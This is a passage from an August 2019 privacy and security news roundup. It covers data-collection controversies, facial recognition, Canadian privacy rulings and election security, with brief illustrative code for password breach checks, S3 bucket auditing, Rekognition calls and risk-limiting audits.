China’s National Computer Network Emergency Response Technical Team has told app operators to reevaluate the types and amounts of personal data being collected from users. The regulator noted in its half-year report that apps were found to be over-collecting personal data, a problem that needs immediate attention. “A large number of apps exhibit abnormal behavior, such as detecting other apps or reading and writing user device files, posing a potential security threat to the user’s information security,” the report stated. The call for rectification comes as China’s digital services continue to grow and become more susceptible to data privacy issues. [Tech in Asia]

WW – Google Shutters Mobile Insights Service Over Privacy Concerns

Google has shut down its Mobile Network Insights service over privacy concerns. The service showed wireless carriers the strength of their signals around the world using data collected from Android devices. Google used only data from users who opted into sharing location data, and the data contained no identifying information; however, the tech company still decided to shutter the service over concerns of regulatory scrutiny, according to sources close to the decision. Google also released the results of a survey in which it found hackers use “password-spraying” attacks because online users keep using the same password even after it has been compromised in a previous breach. [Reuters]
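
Reuse of compromised passwords is exactly what breached-password checks are meant to catch. As a hedged illustration (unrelated to Google's survey or tooling), the sketch below queries the public Pwned Passwords k-anonymity API, which sees only the first five characters of the password's SHA-1 hash.

```python
import hashlib
import urllib.request

def breach_count(password):
    """Return how often a password appears in the public breach corpus."""
    digest = hashlib.sha1(password.encode()).hexdigest().upper()
    prefix, suffix = digest[:5], digest[5:]
    # Only the 5-character hash prefix is sent; matching happens locally.
    url = f"https://api.pwnedpasswords.com/range/{prefix}"
    with urllib.request.urlopen(url) as resp:
        for line in resp.read().decode().splitlines():
            candidate, _, count = line.partition(":")
            if candidate == suffix:
                return int(count)
    return 0

print(breach_count("password123"))  # nonzero means it is a known password
```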

WW – Apple to Make App Store Changes to Protect Children’s Privacy

Apple plans to implement new rules for its App Store in an effort to protect children’s privacy. The tech company plans to ban any app targeted to children from using external analytics software to monitor who interacts with an app and how. Developers have raised issues about the impact the changes will have on their business models, as well as whether it will expose children to more adult apps. In response to those concerns, Apple said it will delay the rule change for now. “We aren’t backing off on this important issue, but we are working to help developers get there,” Apple Spokesman Fred Sainz said in a statement. [The Washington Post]

Law Enforcement

US – Calif. Supreme Court Expands Rules on Police Officer Disclosures

Police officers will see their right to privacy carry less weight in court cases following a decision by the California Supreme Court. Justices overruled a lower court decision that had prohibited the Los Angeles County Sheriff’s Department from giving prosecutors the names of deputies accused of improper conduct. California has previously been tight on officer privacy, but a new law requires more public disclosure of police misconduct. Law enforcement unions have been unsuccessful in arguing that the law shouldn’t apply retroactively to cases of misconduct that occurred before the new law took effect. [CBS San Francisco]

Online Privacy

WW – Malicious Websites Secretly Hacked into iPhones for Years, Says Google

Security researchers at Google say they’ve found a number of malicious websites which, when visited, could quietly hack into a victim’s iPhone by exploiting a set of previously undisclosed software flaws. Google’s Project Zero said in a deep-dive blog post published late on Thursday that the websites were visited thousands of times per week by unsuspecting victims, in what they described as an “indiscriminate” attack. “Simply visiting the hacked site was enough for the exploit server to attack your device, and if it was successful, install a monitoring implant,” said Ian Beer, a security researcher at Project Zero. He said the websites had been hacking iPhones over a “period of at least two years.” The researchers found five distinct exploit chains involving 12 separate security flaws, including seven involving Safari, the in-built web browser on iPhones. The five separate attack chains allowed an attacker to gain “root” access to the device — the highest level of access and privilege on an iPhone. In doing so, an attacker could gain access to the device’s full range of features normally off-limits to the user. That means an attacker could quietly install malicious apps to spy on an iPhone owner without their knowledge or consent. Google privately disclosed the vulnerabilities in February, giving Apple only a week to fix the flaws and roll out updates to its users. That’s a fraction of the 90 days typically given to software developers, giving an indication of the severity of the vulnerabilities. [TechCrunch | Sources say China used iPhone hacks to target Uyghur Muslims | Apple Just Gave 1.4 Billion Users A Reason To Quit Their iPads, iPhones | Why the latest iPhone hack should worry you no matter what phone you use | iPhone Hackers Caught By Google Also Targeted Android And Microsoft Windows, Say Sources]

WW – Facebook Rolls Out Tool to Limit Data Collection from Other Companies

Facebook unveiled a feature designed to allow users to limit the data collected by businesses and applications that are then sent to the tech company. The tools to control “Off-Facebook Activity” give users the opportunity to remove shopping habits, web-browsing histories and other activities that are used for targeted ads from their accounts. Facebook officials said the feature will first be available to those in Spain, Ireland and South Korea, with more countries to be added in the coming months. Facebook Product Manager David Baser called the effort “the most powerful and comprehensive tool ever launched in the industry for this kind of data.” Meanwhile, developers have sent a letter to Apple CEO Tim Cook over privacy changes made in iOS 13. [The Washington Post | Facebook’s New Privacy Feature Comes With a Loophole | Facebook unveils new tools to control how websites share your data for ad-targeting | Facebook Begins Rolling Out New Tool to See Which of Its Data Pals Are Monitoring You | Facebook launches long-awaited privacy tool to clear your browsing history | Facebook’s Clear History privacy tool finally begins rolling out in three countries]

WW – Google Announces New Privacy Strategy, Will Limit Chrome Tracking

Google has proposed a new privacy initiative that aims to curb tracking by digital marketers and advertisers. The plan centers on a “privacy budget” that caps the number of application programming interface calls a website can make to a browser, limiting how much user information a site can pull while folding what it does collect into a larger pool of anonymous data so users retain anonymity. Google Engineering Director for Chrome Security and Privacy Justin Schuh said the new proposal aims to “have the same kind of big, bold vision for how we think privacy should work on the web, how we should make browsers and the web more private by default.” [TechCrunch | Google proposes new privacy standards to protect web browsing data | Google proposes new privacy and anti-fingerprinting controls for the web | Google Chrome proposes ‘privacy sandbox’ to reform advertising evils | As browser rivals block third-party tracking, Google pitches ‘Privacy Sandbox’ peace plan]
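
As described, the budget amounts to a per-site allowance on fingerprinting-relevant API calls. The toy Python sketch below illustrates only that accounting idea; the budget size, cost granularity, and behavior on exhaustion are invented, not taken from Google's proposal.

```python
# Toy accounting model of a per-site "privacy budget".
BUDGET = 40  # invented allowance of fingerprinting-relevant API calls
spent = {}

def allow_call(site, cost=1):
    used = spent.get(site, 0)
    if used + cost > BUDGET:
        return False  # budget exhausted: deny or return a generic answer
    spent[site] = used + cost
    return True

for _ in range(45):
    allow_call("tracker.example")
print(allow_call("tracker.example"))  # -> False once over budget
```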

WW – Facebook Releases Document on Cambridge Analytica Timeline

Facebook and the District of Columbia attorney general released a document to the public about Cambridge Analytica. The document states Facebook employees made a request for an investigation into Cambridge Analytica’s data practices in September 2015. According to the tech company, it did not find out app developer Aleksandr Kogan sold user data to Cambridge Analytica until December 2015. Facebook Vice President and Deputy General Counsel Paul Grewal wrote in a blog post the document was made public to remove confusion over two separate issues. “One involved unconfirmed reports of scraping — accessing or collecting public data from our products using automated means — and the other involved policy violations by Aleksandr Kogan, an app developer who sold user data to Cambridge Analytica,” Grewal writes. “This document proves the issues are separate; conflating them has the potential to mislead people.” [NBC News]

EU – Dutch DPA Asks Irish DPC to Look into Microsoft’s Data Collection Practices

The Dutch data protection authority, the Autoriteit Persoonsgegevens, said Microsoft has remotely collected data from those who use Windows Home and Windows Pro. The DPA announced it discovered the practices as it tested the privacy protections it asked the tech company to implement back in 2017. “Microsoft has complied with the agreements made,” the Dutch authority said. “However, the check also brought to light that Microsoft is remotely collecting other data from users. As a result, Microsoft is still potentially in breach of privacy rules.” The DPA has therefore asked the Irish Data Protection Commission to take on the probe. Microsoft said in a statement it is committed to protecting privacy and that it welcomes “the opportunity to improve even more the tools and choices we offer to these users.” [Reuters | Microsoft’s lead EU data watchdog is looking into fresh Windows 10 privacy concerns]

EU – Hamburg DPA Lays Out Legal Requirements for Google to Resume Audio Transcriptions

The Hamburg Commissioner for Data Protection and Freedom of Information met with representatives from Google to discuss its audio transcription practices. The tech company is not allowed to transcribe audio recordings from its Google Assistant devices unless it meets requirements laid out by the commissioner. Google must receive informed consent from users in order to transcribe any audio, and it must be transparent about instances when a device is incorrectly activated. Hamburg Commissioner for Data Protection and Freedom of Information Johannes Caspar said that should the tech company violate the EU General Data Protection Regulation after it resumes its practices, “urgent measures can be taken at any time to protect the privacy rights of the users.” [Datenschutz]

Other Jurisdictions

IN – Supreme Court Warns Indian Government on Connecting Aadhaar with Social Media

India’s Supreme Court has heard from social media platforms on the possibility of the government linking the country’s Aadhaar identification system to social media accounts. After hearing pleas from Facebook and WhatsApp, Justice Deepak Gupta said such a connection would infringe on citizens’ privacy, adding that the court will eventually have to balance the fundamental rights to privacy and security. Talk of linking Aadhaar and social media accounts began when Attorney General KK Venugopal opined that such a move would boost preventative measures against crime and terrorism. The court will take more responses from stakeholders before a hearing on the matter Sept. 13. [The Economic Times]

Privacy (US)

US – Lawmakers Ask 50 Companies About Student Data Collection

U.S. Sens. Richard Blumenthal, D-Conn., Edward Markey, D-Mass., and Richard Durbin, D-Ill., have asked more than 50 companies about the student information they have gathered and how it is used. The three senators signed two different letters, one that went to education technology companies and another that was sent to data analytics firms. “Education technologies (EdTech) can be important learning tools that allow teachers to follow student progress and facilitate collaboration,” the letter to edtech companies reads. “However, this technology may put students, parents and educational institutions at risk of having massive amounts of personal information stolen, collected, or sold without their permission.” [The Washington Post]

US – Bail Bondsman Obtains Location Data With Fake Calls to Carriers

A Colorado bail bondsman coaxed Sprint, T-Mobile and Verizon into providing him with the location data of bail jumpers through illegal phony calls. Matthew Marre posed as law enforcement when he contacted the phone carriers, which were told Marre was a member of the Colorado Public Safety Task Force dealing with an emergency that required location data on certain individuals. U.S. Sen. Ron Wyden, D-Ore., a privacy critic of phone carriers, took issue with the carriers’ part in Marre’s case. “If true, these allegations would mark a new low in the ongoing scandal of wireless carriers sharing Americans’ location data without our knowledge or consent,” Wyden said in a statement. [The Daily Beast]

US – State Sen. Plans to Reintroduce Biometric Privacy Law to Fla. Lawmakers

Florida state Sen. Gary Farmer plans to propose a previously rejected biometric privacy bill when the state legislature reconvenes. “[Sen.] Farmer does plan on filing it again. He sees it as an issue that we not only expect to face in the future, but in many respects are facing now,” said Jay Shannon, a legislative assistant in Farmer’s office. Farmer’s bill is said to draw parallels to the Illinois Biometric Information Privacy Act. Critics in the legislature say Farmer’s proposal could expose businesses to costly lawsuits that would be especially harmful to small businesses. [The Florida Record]

US – FTC Reaches $30M Settlement with Company Over Deceptive Use of Lead Generators

The U.S. Federal Trade Commission announced it has reached a $30 million settlement with Career Education Corporation over claims it used lead generators in a deceptive manner. The agency alleged CEC took sales leads from lead generators to tell consumers they were associated with the military in order to market different schools. The FTC claimed the company used this misdirection to entice individuals to turn over information in order to help them find jobs or obtain benefits. CEC was also accused of violating the Telemarketing Sales Rule when it reached out to people on the National Do Not Call Registry. In addition to the $30 million, CEC is ordered to investigate the complaints filed against it related to the lead generators. [FTC.gov]

Privacy Enhancing Technologies (PETs)

WW – Using AI, Researchers Mask Emotions from Other AI-Based Products

Researchers from Imperial College London have devised new artificial intelligence software that helps users hide their emotions from AI-based voice assistants. The technology filters emotional speech into “normal” speech, adding a layer between users and the devices they are using. Lead researcher Ranya Aloufi said the new software may be one of the few forms of data protection available against voice assistants’ emotion sensors, which may “significantly compromise their privacy.” [Vice]

Security

US – US Seeing Surge of Ransomware Attacks

More than 40 municipalities have been hit with ransomware attacks over the last year. This type of cyberattack is not new, but its success has led hackers to invest in further research and development for more precise attacks. “The business model for the ransomware operators for the past several years has proved to be successful,” Department of Homeland Security Cybersecurity and Infrastructure Security Agency Director Chris Krebs said. “Years of fine-tuning these attacks have emboldened the actors, and you have seen people pay out — and they are going to continue to pay out.” The latest instance came this week, when 22 Texas agencies were attacked. [The New York Times]

WW – Cybersecurity Analysts Say Human Error Responsible for Most Cloud Breaches

Cybersecurity researchers have found most cloud data breaches occur due to a lack of proper data protection and security measures. Research and advisory firm Gartner estimates up to 95% of cloud breaches stem from human error. The recent Capital One data breach is an example: a flawed firewall implementation opened access for the hacker. “I still report on average one or two misconfigured [Amazon] S3 buckets per month and the data there is not encrypted. I haven’t seen any encrypted data within an S3 bucket for a long time,” said Bob Diachenko, cyberthreat intelligence director of consulting firm Security Discovery. [The Wall Street Journal]
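Misconfigured storage of the kind Diachenko describes is straightforward to check for programmatically. Below is a minimal audit sketch in Python using boto3, the AWS SDK; it assumes credentials with read access to the account’s bucket configuration are already set up, and it simply flags buckets that lack default encryption or a public-access block:

    # Minimal audit sketch: flag S3 buckets that lack default encryption
    # or a public-access block. Assumes boto3 is installed and AWS
    # credentials with the relevant read permissions are configured.
    import boto3
    from botocore.exceptions import ClientError

    s3 = boto3.client("s3")

    def audit_bucket(name):
        try:
            s3.get_bucket_encryption(Bucket=name)
        except ClientError as e:
            if e.response["Error"]["Code"] == "ServerSideEncryptionConfigurationNotFoundError":
                print(name, "has NO default encryption")
            else:
                raise
        try:
            cfg = s3.get_public_access_block(Bucket=name)["PublicAccessBlockConfiguration"]
            if not all(cfg.values()):
                print(name, "has only a partial public-access block")
        except ClientError as e:
            if e.response["Error"]["Code"] == "NoSuchPublicAccessBlockConfiguration":
                print(name, "has no public-access block at all")
            else:
                raise

    for bucket in s3.list_buckets()["Buckets"]:
        audit_bucket(bucket["Name"])

Run on a schedule, a check like this catches exactly the unencrypted, publicly reachable buckets researchers keep stumbling on.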

US – Ill. Passes Bill to Improve Student Data Protection

Gov. JB Pritzker, D-Ill., has signed off on amendments to the Illinois Student Online Personal Protection Act. With the changes, parents hold more control over their children’s data, as the law now requires that parents be notified about the details of student data collection, including what kind of data is being collected and why. Parents must also be notified within 30 days if the school suffers a data breach, and within 60 days if a third party is responsible for a breach. The amendments take effect July 1, 2021. [WBBM Newsradio]

WW – Data Breach Affects Cloud Firewall Users

Cybersecurity and distributed-denial-of-service mitigation firm Imperva notified customers of a data breach affecting its Cloud Web Application Firewall product, previously known as Incapsula. The breach only affected customers who had Cloud WAF accounts through Sept. 17, 2017. Exposed data included email addresses and hashed and salted passwords, as well as application programming interface keys and customer-provided secure sockets layer certificates for a subset of customers. Meanwhile, Presbyterian Healthcare Services has notified 183,000 patients that their personal information was exposed in a phishing scam. [ZDNet]

Smart Cities and Cars

WW – Smart Cities May Be Vulnerable to Cyberattacks

Cities may be underfunding digital security in their quest to install the networks that underpin smart-city development. Of the more than $135 billion projected to be spent on critical-infrastructure cybersecurity in 2024, more than half is expected to go to the financial, IT and defense sectors, leaving cities “woefully underfunded and incredibly vulnerable to cyberattacks,” according to ABI Research officials. [GCN]

WW – Carmaker Use of Tracking Sensors Raises Privacy Concerns

Mercedes-Benz is using sensors to track and repossess vehicles. According to a spokeswoman for Mercedes, drivers agree to location tracking when they purchase the car. Privacy advocates have raised concerns about the practice, warning that the information could be exposed to hackers or otherwise exploited. As of March 2018, all new cars built in the European Union must come with location sensors that can transmit data to emergency services if an accident occurs. Meanwhile, MediaPost reports two Colorado residents dropped their location-privacy lawsuits against Google and Apple “without prejudice” but not the suit filed against Facebook. [CNN]

HK – Hong Kong Protesters Take Down Smart Lampposts

Protesters in Hong Kong have torn down 20 smart lampposts over fears of government surveillance. The government previously noted the cameras in the lampposts were used for traffic monitoring and other simple monitoring functions, not for keeping tabs on citizens. “August 24 was a dark day for Hong Kong’s innovation and technology,” Secretary for Innovation and Technology Nicholas Yang Wei-hsiung said. “Some people ignored facts and used conspiracy theories to claim smart lamp posts are a privacy risk. We have been clear and transparent from the start, but in return, we get damage. We are rather disappointed.” [The South China Morning Post]

+++

 

1-15 August 2019

Biometrics

US – 1 In 5 Calif. Lawmakers Mistakenly Identified by Facial-Recognition Tech

U.S. Assemblyman Phil Ting, D-Calif., has authored a bill that would ban the use of facial-recognition software on police body cameras throughout the state. Ting was one of 26 California legislators who were incorrectly identified as criminals in a recent test conducted by the American Civil Liberties Union. Both the ACLU and Ting said the results prove facial-recognition technology is unreliable. “The software clearly is not ready for use in a law enforcement capacity,” Ting said. “These mistakes, we can kind of chuckle at it, but if you get arrested and it’s on your record, it can be hard to get housing, get a job. It has real impacts.” Sponsored by the ACLU, Assembly Bill 1215 needs to pass the Senate before it lands on the governor’s desk. [Los Angeles Times]

US – Amazon Announces Updates to Rekognition

Amazon has announced improvements to Rekognition, the company’s facial-recognition technology. The software’s accuracy and functionality have been updated to improve facial analysis on attributes such as gender, emotions and age range. “With this release, we have further improved the accuracy of gender identification,” Amazon said in a blog post. “In addition, we have improved accuracy for emotion detection (for all 7 emotions: ‘Happy’, ‘Sad’, ‘Angry’, ‘Surprised’, ‘Disgusted’, ‘Calm’ and ‘Confused’) and added a new emotion: ‘Fear’.” While Amazon stands by its technology, researchers remain unsure of its accuracy, given that emotions are expressed differently by different people. Use of the technology by law enforcement has been the subject of controversy in recent months. [CNBC]
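For context, the attributes Amazon describes are returned by Rekognition’s facial-analysis API. Here is a minimal sketch, using boto3 (the AWS SDK for Python) with a hypothetical S3 bucket and image name, of how a developer might retrieve the emotion and demographic estimates:

    # Minimal sketch: request Rekognition's full facial-analysis
    # attributes (emotions, age range, gender) for an image in S3.
    # The bucket and object names here are hypothetical.
    import boto3

    rekognition = boto3.client("rekognition")

    response = rekognition.detect_faces(
        Image={"S3Object": {"Bucket": "example-bucket", "Name": "face.jpg"}},
        Attributes=["ALL"],  # "DEFAULT" omits emotions and demographics
    )

    for face in response["FaceDetails"]:
        print("age range:", face["AgeRange"], "gender:", face["Gender"]["Value"])
        # Every emotion label carries a confidence score; show the top three.
        top = sorted(face["Emotions"], key=lambda e: e["Confidence"], reverse=True)[:3]
        for emotion in top:
            print("  {}: {:.1f}%".format(emotion["Type"], emotion["Confidence"]))

Each label arrives with a confidence score rather than a verdict, which is one reason researchers caution against reading the output as a measurement of what a person actually feels.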

UK – ICO Investigates Use of Facial Recognition Tech at King’s Cross Site

The U.K. Information Commissioner’s Office has started to investigate the use of facial-recognition software at the King’s Cross development site. The ICO warned that businesses need to demonstrate their use of the technology is “strictly necessary and proportionate” and does not violate any laws. The agency added it will “consider taking action where we find non-compliance with the law.” The site’s owners said the facial-recognition tech has been implemented “in the interest of public safety and to ensure that everyone who visits has the best possible experience.” U.K. Information Commissioner Elizabeth Denham said she was “deeply” concerned about the use of the tech as she confirmed the investigation. U.K. Biometrics Commissioner Paul Wiles called for an update to the laws around facial recognition in response to the King’s Cross site’s use of the tech. [Guardian]

Big Data | Machine Learning | Artificial Intelligence

UK – Research Initiative Launched on Biases Within Law Enforcement Algorithms

The Centre for Data Ethics and Innovation and the Royal United Services Institute have launched a research initiative on possible biases within algorithms used by law enforcement. RUSI will publish its initial research in September, which will be used by CDEI to develop a code of practice for trialing algorithms. CDEI will release a final report on its findings in March 2020, when it will also offer recommendations to the U.K. government. The two groups hosted a series of roundtables in July where police departments, civil society organizations, academics, lawmakers and trade associations discussed the use of algorithms and how the regulatory environment can be improved. [ComputerWeekly]

US – NIST Road Map Covers Developing Standards for AI

The U.S. National Institute of Standards and Technology released its guidance on the government’s approach to developing technical and ethical standards for artificial intelligence. The guidance includes initiatives to assist the government in its efforts to highlight responsible AI use, as well as principles for future standards around the technology. The agency advises that any federal standards for AI must be built to foster innovation and minimize risks of harm. “It is important for those participating in AI standards development to be aware of, and to act consistently with, U.S. government policies and principles, including those that address societal and ethical issues, governance and privacy,” the guidance states. [Nextgov]

UK – Safeguards to Implement When Using Solely Automated AI Systems

As part of its Call for Input on the development of its framework for auditing artificial intelligence, U.K. Information Commissioner’s Office AI Research Fellow Reuben Binns and Technology Policy Adviser Valeria Gallo discuss the safeguards organizations should have in place when they use solely automated AI systems. Under the EU General Data Protection Regulation, organizations need safeguards that allow data subjects to obtain human intervention, express their point of view and contest any decision made about them. Organizations should give their staff the authority to address data subject concerns and override decisions made by AI, and should consider implementing proper system requirements to support “meaningful human review from the design phase.” [Source]

HK – Hong Kong Introduces Framework for Big Data Governance

Hong Kong’s Institute of Big Data Governance has established the world’s first big data governance principles and an independent evaluation system for businesses and society. The framework incorporates references to global standards, including the EU General Data Protection Regulation and China’s Cyber Security Law. The principles aim to accelerate digital transformation while providing a guide to facilitating reliable cross-border data flow. [EJ Insight]

Canada

CA – Class-Action Lawsuit Launched for Canadian Capital One Breach Victims

Capital One faces a class-action lawsuit that seeks compensation for Canadians affected by its recent data breach. Ontario-based law firm Diamond & Diamond launched the lawsuit. The representative plaintiff is an Ontario woman who obtained a Costco Wholesale MasterCard through the credit card company. The statement of claim pushes for the lawsuit to receive class-action certification and calls for $350 million in financial compensation for the approximately six million Canadians impacted by the incident. Capital One announced it will begin to notify affected individuals via email and letter. [Canadian Press]

CA – OPC Publishes Guidance on Using Social Media

The Office of the Privacy Commissioner of Canada released guidelines to help Canadians protect their privacy when on social media. The OPC advises social media users to read social media platforms’ privacy policies, to get consent when sharing content that involves other users and to understand and manage privacy settings. “It’s best to choose the highest and most restrictive security settings available and not give out information like your phone number, birthday, social insurance number, address and location, and you should consider using a pseudonym,” the guidance states. [OPC]

CA – Political Parties Don’t Meet Voters’ Privacy Expectations: Report

Consumer advocacy group OpenMedia says Canada’s political parties are not meeting voters’ basic expectations of privacy as set out by the country’s Chief Electoral Officer and the Office of the Privacy Commissioner of Canada (OPC) [read joint guidance]. The organization conducted a review [PDF] of the parties’ new privacy policies against the guidelines the Chief Electoral Officer and the OPC issued to support compliance with Bill C-76 [see here & here], amendments to the Canada Elections Act. The parties reviewed were the Liberal Party of Canada, Conservative Party of Canada, Green Party of Canada, New Democratic Party and Bloc Québécois. The analysis used privacy policies as of July 2, following the June 30 deadline for all parties to comply with C-76. According to the report, every party except the NDP failed when it comes to informing individuals if they have been subject to a data breach. All parties got partial credit for being transparent about how a person’s information will be used: while parties give examples of how data is used and shared, they are “not clear whether this is an exhaustive list or whether there are other ways in which data is used or shared.” Parties also received partial credit on disclosing what information is shared and on obtaining consent to collect, use and share personal information, with the report noting that parties do “not spell out key best practice details such as obtaining consent from inferred or predictive data, or obtaining express consent for collecting information on ethnicity, political views or religion.” OpenMedia’s executive director Laura Tribe [here & Twitter here] said: “In the wake of the Facebook and Cambridge Analytica scandal, the constant talk of misinformation, and the growing number of severe data breaches affecting people in Canada, you would hope our political parties would see the value in stepping up to embrace transparency and data protection. Instead, what we’ve been left with is a brutally hypocritical double standard, where politicians see themselves as above the law, and our most sensitive personal data as nothing more than election fuel.” [MobileSyrup]

CA – Poll Suggests Canadians Feel They Lack Control Over Private Data

A majority of Canadians know their rights when it comes to privacy, but polling data in a report commissioned by Privacy Commissioner Daniel Therrien and released earlier this year suggests an equal number also feel powerless over how private businesses use their data [see: 2018-19 Survey of Canadians on Privacy – here & here]. It says, “Most Canadians feel they have little to no control over how their personal information is being used by companies (67%) or by government (61%).” Moreover, 86% of Canadians disagreed that companies should be able to share people’s personal information for purposes other than to provide them services. After a string of news reports about the misuse of personal information by businesses and privacy breaches – the latest being the massive hack of credit card company Capital One – it’s no surprise that Canadians are increasingly concerned about privacy protection, the report says. “Among those concerned, 37% are extremely concerned (unchanged from 2016, but up from 34% in 2014). Furthermore, a significant minority (45%) do not feel that businesses in general respect their privacy rights,” the report reads. Social media is also a source of concern – 87% of Canadians are worried about social media platforms gathering personal information to create detailed profiles of them. The telephone survey was conducted by Phoenix Strategic Perspectives Inc. with 1,516 Canadians aged 16 and older between Feb. 6 and Feb. 20, 2019, and the overall results are considered accurate within 2.5 percentage points, 19 times out of 20. [IT World Canada]

CA – Metrolinx Plan to Sell Riders’ Data Draws Concern from Ontario OIPC

Ontario Information and Privacy Commissioner Brian Beamish says there are risks to Metrolinx’s plan to sell anonymized ridership data to private companies. The transit agency has agreed to consult with his office before considering proposals to share the data. In a letter addressed to Ontario NDP deputy leader Sara Singh, Beamish said that until the opposition complained about it, he had not been aware of Metrolinx’s plan, unveiled last week, to sell riders’ information. On August 1, Singh wrote a letter to Beamish asking for an investigation into the “ramifications of the use of customer data to further commercial interests” [read NDP notice]. Beamish said he “would be very concerned” if the agency, a provincial Crown corporation in charge of transportation for the Greater Toronto and Hamilton Area, “were to share information about its customers” without first conducting “a complete review to ensure that the privacy of individuals is protected.” Beamish said he had spoken with Metrolinx representatives, and while they assured him the agency wouldn’t share any data that would reveal riders’ identities, “privacy risks may still exist.” However, he also said he was “pleased to confirm that Metrolinx’s chief privacy officer and chief marketing officer have committed to consulting with our office. In this way, the IPC can ensure that any information released by Metrolinx is properly de-identified and that rider privacy is protected. This should help assure Ms. Singh, as well as other Ontarians, that steps are being taken to address the privacy risks of disclosures of this nature.” Metrolinx confirmed last Thursday it was considering selling its passengers’ data as part of a broader plan to raise revenue through private-sector sponsorships that could include auctioning off naming rights to GO Transit stations. A Metrolinx document posted Friday, detailing its request for expressions of interest in private sponsorships, lists a “data exchange” as one of the potential benefits for corporations that partner with the agency. It states the exchange could include the “potential use of aggregated and anonymized Presto ridership and sales data” for “research collaboration” and “customer mapping research” [read 6 pg PDF plan overview & TS coverage]. The document says personal information recorded through the Presto fare card system, which can include details such as credit card numbers and home addresses, wouldn’t be shared. Instead, the agency believes anonymized data about topics such as station usage, ridership by time of day and ridership growth could be valuable to sponsors. According to the privacy commissioner, there are some “exceptional cases” in which government organizations sell personal information that’s been scrubbed of identifying features. For instance, the Municipal Property Assessment Corporation, a non-profit corporation accountable to the provincial government, sells non-identifiable property assessment data to the public. [The Toronto Star | Metrolinx to consult Ontario privacy watchdog before sharing ridership data | GO Transit station names could change with new government proposal | Doug Ford slammed for offering to sell transit riders’ data to corporations | Metrolinx to sell naming rights for railway stations, waiting areas, parking lots | NDP blasts GO Transit naming rights in the most bizarre way]

CA – Alberta Court Ruling Prompts Call for Legislation to Protect People Who Need Police Record Checks

When prospective job applicants are asked for police record checks, what comes back can depend on what province they’re in. There have been cases of documents coming back that include unsubstantiated tips, unproved allegations and even mental-health incidents. They can cause people to miss out on jobs, lose academic scholarships or even get turned away at international borders. An Alberta court ruling released Aug. 1 [see Edmonton (Police Service) v Alberta (Information and Privacy Commissioner), 2019 ABQB 587 – CanLII & read PDF] has underscored those concerns [read extended coverage] – and led to calls for that province to introduce legislation to protect people from being “held ransom” by the discretion of police officers. The decision upheld a privacy complaint filed by an Edmonton man [read 32 pg PDF OIPC findings in Case File F7687]. He lost his job after the city’s police force erroneously labelled him a sex offender and illegally passed along details from a youth conviction to his employer, where he had worked for more than a decade. The judge in the case said the situation underscored the need for laws to protect people from having such information released. Until that happens, he said, prospective employees in sectors that require those documents are effectively “held ransom” by a system that relies on police officers’ discretion. Alberta’s privacy commissioner is waiting to see whether the Edmonton Police Service will appeal the ruling before sending a letter to the provincial government calling for change [see here]. Alberta’s Justice Minister says the government is reviewing the decision. The Alberta Association of Chiefs of Police issued guidelines in 2018 requesting that officers not release non-conviction information in police checks unless they think it is relevant to the person’s job. Ontario is the only province in Canada with legislation that restricts the type of information police can release. Under a law that took effect last year, police cannot release records that did not result in convictions in all but the most extreme circumstances. The B.C. government adopted a policy in 2014 that forbids the disclosure of mental-health calls. However, civil-liberties groups in that province say mishandled police record checks are an ongoing problem and a law is needed. [The Globe and Mail | Alberta government urged to regulate police record checks]

E-Government

US – Judge Rules No More Paperless Voting in Georgia After 2019

A federal judge has ruled that the US state of Georgia must phase out its paperless voting systems before the 2020 primary election. The ruling does not require the state to move to hand-marked ballots. The state is now prohibited from conducting elections on the old direct-recording electronic (DRE) touchscreen machines it has used for 17 years, and the ruling does not allow them to be kept as stopgap measures. The DREs do not generate an auditable paper trail for votes. The ruling allows the state to proceed with its plan to purchase new touchscreen machines that generate a paper ballot to be scanned. [statescoop: Federal judge bans paperless voting machines in Georgia after 2019 | lawyerscommittee.org: CIVIL ACTION NO. 1:17-CV-2989-AT]

US – States Making Some Progress in Election Systems Security: Report

A report from the Brennan Center for Justice examines the steps US states have taken toward replacing outdated systems and adopting “statistically sound audits,” two recommendations made by the Senate Select Committee on Intelligence in its report on Russian interference in US elections. The report looks at progress since 2016 and what remains to be done before the 2020 election. The Brennan Center says that while some states are replacing paperless direct-recording electronic (DRE) voting machines with systems that generate a voter-verifiable paper record, as many as 16 million people will still be casting their 2020 votes on machines that do not provide any sort of paper trail. At least 24 states are expected to require post-election audits before certifying 2020 election results. Just two states, Colorado and Rhode Island, require risk-limiting audits (RLAs) before election results can be legally certified; other states are piloting RLA programs. [brennancenter.org: Voting Machine Security: Where We Stand Six Months Before the New Hampshire Primary | meritalk: Eight States Will Vote Paperless in 2020 Despite Security Risks]
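For readers unfamiliar with RLAs: auditors hand-read a random sample of paper ballots and stop once the sample provides strong statistical evidence that the reported outcome is correct. The sketch below illustrates the BRAVO ballot-polling method, one common RLA procedure, for a two-candidate contest; the reported vote share, sample and 5% risk limit are illustrative only, not drawn from any real election:

    # Minimal sketch of a BRAVO ballot-polling risk-limiting audit for a
    # two-candidate contest. The reported winner share, sample and risk
    # limit below are illustrative.

    def bravo_confirms(reported_winner_share, sample, risk_limit=0.05):
        """True if the sampled ballots confirm the outcome at the risk limit."""
        assert reported_winner_share > 0.5
        t = 1.0  # sequential likelihood ratio
        for ballot in sample:
            if ballot == "winner":
                t *= reported_winner_share / 0.5
            else:
                t *= (1 - reported_winner_share) / 0.5
            if t >= 1 / risk_limit:
                return True  # strong evidence; auditing can stop
        return False  # keep sampling, or escalate to a full hand count

    # Reported 60/40 outcome; hand-read a random sample of 45 ballots.
    sample = ["winner"] * 30 + ["loser"] * 15
    print(bravo_confirms(0.60, sample))  # -> True

The wider the reported margin, the fewer ballots auditors must inspect before the test statistic crosses the 1/risk-limit threshold; very tight races can escalate to a full hand count.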

US – Blockchain Does Not Ensure Secure Voting: Experts

Thirty-two US states allow some sort of online voting for some voters – often to let members of the military and their families who are living overseas cast absentee ballots. Some US states have launched blockchain-based mobile voting pilots. Security experts have expressed concerns that using blockchain for mobile voting spells trouble. Among the concerns: blockchain-based voting assumes the device from which someone casts a vote contains no malware. Experts have also criticized Voatz, the company that provided the technology used in three blockchain-based mobile voting pilots, for not providing a “detailed technical description” of the technology it uses, noting that the technology has not been federally certified. [computerworld: Why blockchain-based voting could threaten democracy | cse.sc.edu: What We Don’t Know About the Voatz “Blockchain” Internet Voting System]

US – Researchers Find Back-end Election Systems Are Connected to the Internet

Election security experts have found what they believe to be more than 30 back-end election systems in 10 US states connected to the Internet, some for more than a year. The researchers contacted the jurisdictions and some removed the systems from the Internet, but others did not. Some election officials said their systems were not connected because the vendor had installed the system and the jurisdiction had no oversight in the process. [vice.com: Exclusive: Critical U.S. Election Systems Have Been Left Exposed Online Despite Official Denials]

